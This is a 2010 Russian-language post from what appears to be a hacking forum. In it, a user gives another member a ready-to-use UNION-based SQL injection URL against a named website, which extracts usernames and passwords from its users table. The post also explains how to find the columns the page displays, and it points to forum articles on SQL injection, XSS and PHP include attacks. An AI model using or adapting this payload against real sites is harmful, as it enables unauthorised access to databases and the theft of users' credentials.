20.01.2010, 21:36
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009
Репутация:
18
|
|
Для GinTonic:
1. Думаю для автора скули лутше так будет):
Код:
http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--
2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать!
Читай статьи на форуме))):
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
SQL инъекция (в т.ч. и blind SQL)
Примеры:
Sql Инъекции
Последний раз редактировалось Alf0x0ns; 20.01.2010 в 22:31..
|
|
|